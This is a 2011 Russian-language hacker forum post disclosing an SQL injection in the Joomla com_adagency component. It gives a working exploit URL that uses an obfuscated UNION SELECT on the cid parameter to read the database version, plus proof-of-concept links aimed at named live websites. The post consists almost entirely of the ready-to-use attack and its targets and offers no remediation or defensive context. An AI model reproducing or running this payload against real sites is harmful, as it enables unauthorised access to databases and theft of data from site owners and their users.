Показать сообщение отдельно
Старый 02.08.2011, 11:29   #24
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Exclamation Joomla com_adagency SQl-Inj

#Продукт: com_adagency
#Тип уязвимости: SQL-Inj
#Автор: z0mbyak

Exploit: /index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version()--

PoC:
http://www.charliesheens-korner.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--


http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=0&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--


Специально для forum.antichat.ru и rdot.org/forum/

P.S. Вывод: The requested URL /вывод&Itemid=2 was not found on this server.
z0mbyak вне форума   Ответить с цитированием